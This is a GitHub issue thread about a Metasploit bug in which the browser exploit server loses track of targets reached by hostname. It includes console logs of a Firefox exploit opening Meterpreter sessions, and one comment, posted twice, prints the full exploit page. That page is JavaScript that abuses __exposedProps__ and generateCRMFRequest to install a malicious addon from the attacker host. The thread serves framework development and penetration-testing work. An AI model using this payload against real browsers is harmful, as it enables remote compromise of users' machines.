### ISSUE TITLE
Failure to track browser when accessing by VHOST in Msf::Exploit::Remote::BrowserExploitServer

### ISSUE THREAD

**Issue by sempervictus** [rapid7/metasploit-framework#7098]
## Steps to reproduce

How'd you do it?

1. Configure and start exploits/multi/browser/firefox_proto_crmfrequest.rb on http://10.0.0.1:80/
2. Install FireFox 14
4. Configure DNS entry for test.nil to point to 10.0.0.1
3. Using the vulnerable FFox install, navigate to http://10.0.0.1/, get shell, be happy:
```
msf exploit(firefox_proto_crmfrequest) > jobs -v

Jobs
====

  Id  Name                                              Payload                           Payload opts          URIPATH  Start Time                 Handler opts
  --  ----                                              -------                           ------------          -------  ----------                 ------------
  0   Auxiliary: spoof/dns/native_spoofer                                                                                2016-07-14 01:31:42 -0400  
  8   Exploit: multi/browser/firefox_proto_crmfrequest  windows/meterpreter/reverse_http  http://10.0.0.1:8080  /        2016-07-14 01:58:32 -0400  http://10.0.0.1:8080

msf exploit(firefox_proto_crmfrequest) > 
[*] No cookie received for 10.0.0.3, resorting to headers hash.
[*] Gathering target information for 10.0.0.3
[*] Sending HTML response to 10.0.0.3
[*] Info receiver page called from 10.0.0.3
[*] Received cookie 'IbiiipxgJROgSo' from 10.0.0.3
[*] Received sniffed browser data over POST from 10.0.0.3
{"os_name"=>["Windows 7"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["Firefox"], "ua_ver"=>["14.0"], "arch"=>["x86"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["null"], "vuln_test"=>["true"]}.
[-] Target 10.0.0.3 has requested an unknown path: /favicon.ico
[*] Received cookie 'IbiiipxgJROgSo' from 10.0.0.3
[*] Serving exploit to user 10.0.0.3 with tag IbiiipxgJROgSo
[*] Setting target "IbiiipxgJROgSo" to :tried.
[*] Comparing requirement: source=script vs source=script
[*] Comparing requirement: ua_name=Firefox vs ua_name=Firefox
[*] Comparing requirement: ua_ver=#<Proc:0x00000010f82e00@/usr/share/metasploit-framework/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb:56 (lambda)> vs ua_ver=14.0
[*] Sending HTML
[-] Target 10.0.0.3 has requested an unknown path: /favicon.ico
[*] Received cookie 'IbiiipxgJROgSo' from 10.0.0.3
[*] Serving exploit to user 10.0.0.3 with tag IbiiipxgJROgSo
[*] Setting target "IbiiipxgJROgSo" to :tried.
[*] Comparing requirement: source=script vs source=script
[*] Comparing requirement: ua_name=Firefox vs ua_name=Firefox
[*] Comparing requirement: ua_ver=#<Proc:0x00000010f82e00@/usr/share/metasploit-framework/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb:56 (lambda)> vs ua_ver=14.0
[*] Sending the malicious addon
[*] http://10.0.0.1:8080 handling request from 10.0.0.3; (UUID: er1zuppe) Staging Native payload...
[*] Meterpreter session 4 opened (10.0.0.1:8080 -> 10.0.0.3:49295) at 2016-07-14 02:02:32 -0400
```
5 Navigate to the DNS hostname configured, and be sad:
```
[*] No cookie received for 10.0.0.3, resorting to headers hash.
[*] Gathering target information for 10.0.0.3
[*] Sending HTML response to 10.0.0.3
[*] Info receiver page called from 10.0.0.3
[*] Received cookie 'FOCmaEW' from 10.0.0.3
[*] Received sniffed browser data over POST from 10.0.0.3
{"os_name"=>["Windows 7"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["Firefox"], "ua_ver"=>["14.0"], "arch"=>["x86"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["null"], "vuln_test"=>["true"]}.
[-] Target 10.0.0.3 has requested an unknown path: /favicon.ico
[*] Received cookie 'FOCmaEW' from 10.0.0.3
[*] Serving exploit to user 10.0.0.3 with tag FOCmaEW
[*] Setting target "FOCmaEW" to :tried.
[*] Comparing requirement: source=script vs source=script
[*] Comparing requirement: ua_name=Firefox vs ua_name=Firefox
[*] Comparing requirement: ua_ver=#<Proc:0x00000010f82e00@/usr/share/metasploit-framework/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb:56 (lambda)> vs ua_ver=14.0
[*] Sending HTML
[-] Target 10.0.0.3 has requested an unknown path: /favicon.ico
[-] Target 10.0.0.3 has requested an unknown path: /favicon.ico
[-] Target 10.0.0.3 has requested an unknown path: /favicon.ico
[*] No cookie received for 10.0.0.3, resorting to headers hash.
[*] Serving exploit to user 10.0.0.3 with tag 46038857eff739752bfbbd54fb86f467
[*] Browsing visiting directly to the exploit URL is forbidden.
```

In this case, DNS is being provided by the spoofer in #6611, but given that the redirection occurs, its highly unlikely to be related. Quick look through _lib/msf/core/exploit/remote/browser_exploit_server.rb_ did not yield significant insight other than that the tag is wrong for some reason on the second request. Target info also seems to be missing a bit of data, not sure if its related.

## Expected behavior

The same across access by VHOST and access by IP addr.

## Current behavior

As described above, and not what is expected or desired.

Log contains zilch on this, its not a runtime error, but a logic problem somewhere.

### Metasploit version

msf exploit(firefox_proto_crmfrequest) > version 
Framework: 4.12.9-dev
Console  : 4.12.9-dev

### I installed Metasploit with:
- [x] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

What OS are you running Metasploit on?

Kali current in this case

**Comment by sempervictus** [comment]
Tracking this back a bit, it seems that the problem comes from Msf::Exploit::Remote::HttpServer's get_uri function by way of get_module_uri in the exploit itself. Since none of the options in the method allow using a String (all addrs), there's no convenient way to override the behavior.

In a perfect world, we would be able to pull the VHOST information from the request headers for this purpose (also allowing serving multiple service across the same URI, port, and address). Since the initial request comes in to test.nil, and is then redirected, it seems to break the logic in BES.

**Comment by sempervictus** [comment]
Looks like we do need to have the header's Host value included in order to get this to work:
```
[*] Comparing requirement: ua_ver=#<Proc:0x0000000f1564b8@/usr/share/metasploit-framework/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb:54 (lambda)> vs ua_ver=14.0
[*] Sending HTML
[*] 
      <html>
      <body>
      Bad things are happening
      <div id='payload' style='display:none'>
        
      if (!window.done) {
        window.AddonManager.getInstallForURL(
          'http://www.test.nil/GOfLXY/addon.xpi',
          function(install) { install.install() },
          'application/x-xpinstall'
        );
        window.done = true;
      }
    
      </div>
      <script>
        
      try{InstallTrigger.install(0)}catch(e){p=e;};
      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
      p2.__exposedProps__={
        constructor:'rw',
        prototype:'rw',
        defineProperty:'rw',
        __exposedProps__:'rw'
      };
      var s = document.querySelector('#payload').innerHTML;
      var q = false;
      var register = function(obj,key) {
        var runme = function(){
          if (q) return;
          q = true;
          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
        };
        try {
          p2.constructor.defineProperty(obj,key,{get:runme});
        } catch (e) {}
      };
      for (var i in window) register(window, i);
      for (var i in document) register(document, i);
    
      </script>
      </body>
      </html>
    
[*] Received cookie 'HLABuutjQrSFNFJvmgpQeq' from 10.0.0.3
[*] Serving exploit to user 10.0.0.3 with tag HLABuutjQrSFNFJvmgpQeq
[*] Setting target "HLABuutjQrSFNFJvmgpQeq" to :tried.
[*] Comparing requirement: source=script vs source=script
[*] Comparing requirement: ua_name=Firefox vs ua_name=Firefox
[*] Comparing requirement: ua_ver=#<Proc:0x0000000f1564b8@/usr/share/metasploit-framework/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb:54 (lambda)> vs ua_ver=14.0
[*] Sending the malicious addon
[*] http://10.0.0.1:8080 handling request from 10.0.0.3; (UUID: zzhnmcff) Staging Native payload...
[*] Meterpreter session 2 opened (10.0.0.1:8080 -> 10.0.0.3:55949) at 2016-07-17 04:50:08 -0400
```
Relevant PR with the fix used here @ #7107

**Comment by sempervictus** [comment]
Looks like we do need to have the header's Host value included in order to get this to work:
```
[*] Comparing requirement: ua_ver=#<Proc:0x0000000f1564b8@/usr/share/metasploit-framework/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb:54 (lambda)> vs ua_ver=14.0
[*] Sending HTML
[*] 
      <html>
      <body>
      Bad things are happening
      <div id='payload' style='display:none'>
        
      if (!window.done) {
        window.AddonManager.getInstallForURL(
          'http://www.test.nil/GOfLXY/addon.xpi',
          function(install) { install.install() },
          'application/x-xpinstall'
        );
        window.done = true;
      }
    
      </div>
      <script>
        
      try{InstallTrigger.install(0)}catch(e){p=e;};
      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
      p2.__exposedProps__={
        constructor:'rw',
        prototype:'rw',
        defineProperty:'rw',
        __exposedProps__:'rw'
      };
      var s = document.querySelector('#payload').innerHTML;
      var q = false;
      var register = function(obj,key) {
        var runme = function(){
          if (q) return;
          q = true;
          window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
        };
        try {
          p2.constructor.defineProperty(obj,key,{get:runme});
        } catch (e) {}
      };
      for (var i in window) register(window, i);
      for (var i in document) register(document, i);
    
      </script>
      </body>
      </html>
    
[*] Received cookie 'HLABuutjQrSFNFJvmgpQeq' from 10.0.0.3
[*] Serving exploit to user 10.0.0.3 with tag HLABuutjQrSFNFJvmgpQeq
[*] Setting target "HLABuutjQrSFNFJvmgpQeq" to :tried.
[*] Comparing requirement: source=script vs source=script
[*] Comparing requirement: ua_name=Firefox vs ua_name=Firefox
[*] Comparing requirement: ua_ver=#<Proc:0x0000000f1564b8@/usr/share/metasploit-framework/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb:54 (lambda)> vs ua_ver=14.0
[*] Sending the malicious addon
[*] http://10.0.0.1:8080 handling request from 10.0.0.3; (UUID: zzhnmcff) Staging Native payload...
[*] Meterpreter session 2 opened (10.0.0.1:8080 -> 10.0.0.3:55949) at 2016-07-17 04:50:08 -0400
```
Relevant PR with the fix used here @ #7107

**Comment by wchen-r7** [comment]
Resolved in #7107
